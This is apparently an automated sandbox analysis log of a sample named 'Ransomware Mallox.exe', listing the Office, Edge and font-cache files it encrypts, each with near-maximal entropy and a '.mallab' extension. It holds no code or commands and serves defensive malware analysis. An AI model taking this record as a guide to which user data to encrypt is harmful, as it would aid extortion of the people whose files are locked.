      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\10.34.0.50\Part-DE entropy: 7.99918756428Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\10.34.0.50\LICENSE entropy: 7.99238738986Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\10.34.0.50\Filtering Rules entropy: 7.9999030809Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Narrow\31558910439.ttf entropy: 7.99915877891Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Narrow\30284701761.ttf entropy: 7.99936215541Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Narrow\24153076628.ttf entropy: 7.99932645197Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Display\30264859306.ttf entropy: 7.99923889626Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Display\29442803203.ttf entropy: 7.99924512568Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Display\28367963232.ttf entropy: 7.99922475466Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Display\23001069669.ttf entropy: 7.99913044384Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos\31169036496.ttf entropy: 7.99922492131Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos\29939506207.ttf entropy: 7.99924888035Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos\28315153308.ttf entropy: 7.99923967966Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos\27160079615.ttf entropy: 7.999216542Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules.xml entropy: 7.99960219664Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule230172v1.xml entropy: 7.99472162336Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule230170v1.xml entropy: 7.99345369718Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules.xml entropy: 7.99981297348Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule440007v3.xml entropy: 7.99574178842Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule440002v9.xml entropy: 7.99646123947Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\FontCache\4\PreviewFont\flat_officeFontsPreview_4_35.ttf entropy: 7.99972066721Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Narrow\37262344671.ttf entropy: 7.99919997814Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officesetup.exe.db entropy: 7.9925769354Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db entropy: 7.99224928527Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officec2rclient.exe.db entropy: 7.99192402378Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db entropy: 7.99131015608Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\1975C9BF-831E-44E7-8FD4-112275A074AD entropy: 7.99891624036Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\7FDF1322-9EAD-442A-85C2-C39D5CC6893F entropy: 7.9988577876Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml entropy: 7.99947755838Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule230172v1.xml entropy: 7.99354434551Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule230170v1.xml entropy: 7.99212583896Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install_2023-10-05_095006_950-1db4.log entropy: 7.99379354576Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000051\dist\en-us_web\fabric.js.gz entropy: 7.99919689374Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\Ocomprivate.zip entropy: 7.99827994178Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\Microsoft.Lync.Utilities.zip entropy: 7.99735769973Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\Microsoft.Lync.Utilities.Controls.zip entropy: 7.99331468412Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\Microsoft.Lync.Model.zip entropy: 7.99790017534Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000109\dist\taskpane.js.map.gz entropy: 7.99988564964Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000109\dist\taskpane.js.gz entropy: 7.9995302862Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000109\dist\vendor.js.map.gz entropy: 7.99830488007Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000109\dist\vendor.js.gz entropy: 7.99559877527Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000051\dist\en-us_web\vendor.js.map.gz entropy: 7.99974616947Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000051\dist\en-us_web\vendor.js.gz entropy: 7.9991550171Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000051\dist\en-us_web\taskpanev2.js.map.gz entropy: 7.9995023817Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000051\dist\en-us_web\taskpanev2.js.gz entropy: 7.99860704733Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000051\dist\en-us_web\taskpane.js.map.gz entropy: 7.99946982326Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000051\dist\en-us_web\fabric.js.map.gz entropy: 7.99974694447Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000051\dist\en-us_web\taskpane.js.gz entropy: 7.99878777635Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite-shm.mallab (copy) entropy: 7.99376118014Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite-wal.mallab (copy) entropy: 7.99985986401Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\Microsoft.Lync.Utilities.Controls.zip.mallab (copy) entropy: 7.99331468412Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\Microsoft.Lync.Utilities.zip.mallab (copy) entropy: 7.99735769973Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\Microsoft.Lync.Model.zip.mallab (copy) entropy: 7.99790017534Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\Ocomprivate.zip.mallab (copy) entropy: 7.99827994178Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000051\dist\en-us_web\taskpane.js.gz.mallab (copy) entropy: 7.99878777635Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000051\dist\en-us_web\fabric.js.gz.mallab (copy) entropy: 7.99919689374Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000051\dist\en-us_web\fabric.js.map.gz.mallab (copy) entropy: 7.99974694447Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000051\dist\en-us_web\taskpane.js.map.gz.mallab (copy) entropy: 7.99946982326Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000051\dist\en-us_web\taskpanev2.js.gz.mallab (copy) entropy: 7.99860704733Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000051\dist\en-us_web\taskpanev2.js.map.gz.mallab (copy) entropy: 7.9995023817Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000051\dist\en-us_web\vendor.js.gz.mallab (copy) entropy: 7.9991550171Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000051\dist\en-us_web\vendor.js.map.gz.mallab (copy) entropy: 7.99974616947Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000109\dist\vendor.js.gz.mallab (copy) entropy: 7.99559877527Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000109\dist\vendor.js.map.gz.mallab (copy) entropy: 7.99830488007Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000109\dist\taskpane.js.gz.mallab (copy) entropy: 7.9995302862Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000109\dist\taskpane.js.map.gz.mallab (copy) entropy: 7.99988564964Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Adobe\Acrobat\DC\IconCacheAcro65536.dat.mallab (copy) entropy: 7.99906548408Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Comms\UnistoreDB\USSres00001.jrs.mallab (copy) entropy: 7.99994348459Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Ad Blocking\blocklist.mallab (copy) entropy: 7.99790300633Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Comms\UnistoreDB\USSres00002.jrs.mallab (copy) entropy: 7.99994072397Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Comms\UnistoreDB\USStmp.jtx.mallab (copy) entropy: 7.9999425913Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Autofill\4.0.0.8\edge_autofill_field_data.json.mallab (copy) entropy: 7.99923866824Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Autofill\4.0.0.8\v1FieldTypes.json.mallab (copy) entropy: 7.99965123319Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-651E8F64-1910.pma.mallab (copy) entropy: 7.99995672162Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\CertificateRevocation\6498.2023.8.1\crl-set.mallab (copy) entropy: 7.99209616435Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-651E902E-1634.pma.mallab (copy) entropy: 7.99995368426Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log.mallab (copy) entropy: 7.99959580911Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-651E9065-1B98.pma.mallab (copy) entropy: 7.99995287175Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\DawnCache\data_1.mallab (copy) entropy: 7.99932530803Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\DawnCache\index.mallab (copy) entropy: 7.9993941967Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db.mallab (copy) entropy: 7.99203754513Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\EdgeEDrop\EdgeEDropSQLite.db.mallab (copy) entropy: 7.99442506545Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\ExtensionActivityEdge.mallab (copy) entropy: 7.99468868724Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\Favicons.mallab (copy) entropy: 7.990338024Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\eventpage_bin_prod.js.mallab (copy) entropy: 7.99791888758Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\GPUCache\data_1.mallab (copy) entropy: 7.99935597684Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\HubApps Icons.mallab (copy) entropy: 7.9937029673Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\load_statistics.db-shm.mallab (copy) entropy: 7.99378951267Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\GPUCache\index.mallab (copy) entropy: 7.99929221153Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\History.mallab (copy) entropy: 7.99882120083Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\Network\Cookies.mallab (copy) entropy: 7.9912828793Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\Login Data.mallab (copy) entropy: 7.99661263267Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\Network\Reporting and NEL.mallab (copy) entropy: 7.99544337946Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\Network\Trust Tokens.mallab (copy) entropy: 7.99521118352Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\Network Action Predictor.mallab (copy) entropy: 7.99580584865Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\load_statistics.db-wal.mallab (copy) entropy: 7.99727564192Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\Nurturing\campaign_history.mallab (copy) entropy: 7.99083888814Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\Secure Preferences.mallab (copy) entropy: 7.99375390003Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_1.mallab (copy) entropy: 7.99930218832Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\index.mallab (copy) entropy: 7.99929807992Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Reporting and NEL.mallab (copy) entropy: 7.995028169Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1.mallab (copy) entropy: 7.99938459987Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Trust Tokens.mallab (copy) entropy: 7.99470788807Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\Top Sites.mallab (copy) entropy: 7.99134091667Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\index.mallab (copy) entropy: 7.99924716346Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\Vpn Tokens.mallab (copy) entropy: 7.99343680233Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\Visited Links.mallab (copy) entropy: 7.99855557503Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\uu_host_config.mallab (copy) entropy: 7.99956211416Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\EADPData Component\4.0.2.33\data.txt.mallab (copy) entropy: 7.99767931462Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\Web Data.mallab (copy) entropy: 7.99911405165Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\auto_open_controller.js.mallab (copy) entropy: 7.9998494359Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_checkout_page_validator.js.mallab (copy) entropy: 7.99978833493Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_tracking_page_validator.js.mallab (copy) entropy: 7.99775770759Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_confirmation_page_validator.js.mallab (copy) entropy: 7.99984762508Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\product_page.js.mallab (copy) entropy: 7.99983878026Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_driver.js.mallab (copy) entropy: 7.99988305041Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\shoppingfre.js.mallab (copy) entropy: 7.99950768128Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\bnpl\bnpl.bundle.js.mallab (copy) entropy: 7.99978018032Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\shopping.js.mallab (copy) entropy: 7.99996492107Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\edge_driver.js.mallab (copy) entropy: 7.99991888932Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\ru\strings.json.mallab (copy) entropy: 7.99212196187Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\de\strings.json.mallab (copy) entropy: 7.99730509631Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\es\strings.json.mallab (copy) entropy: 7.99711073963Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\en-GB\strings.json.mallab (copy) entropy: 7.99696850749Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\ar\strings.json.mallab (copy) entropy: 7.99748508281Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\fr\strings.json.mallab (copy) entropy: 7.99691637757Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\fr-CA\strings.json.mallab (copy) entropy: 7.99708763956Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\it\strings.json.mallab (copy) entropy: 7.9968333299Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\id\strings.json.mallab (copy) entropy: 7.99688835553Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\ja\strings.json.mallab (copy) entropy: 7.99746021509Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\nl\strings.json.mallab (copy) entropy: 7.99675392814Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\pt-BR\strings.json.mallab (copy) entropy: 7.99714337266Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\pt-PT\strings.json.mallab (copy) entropy: 7.99662173909Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\zh-Hans\strings.json.mallab (copy) entropy: 7.99633046595Jump to dropped file
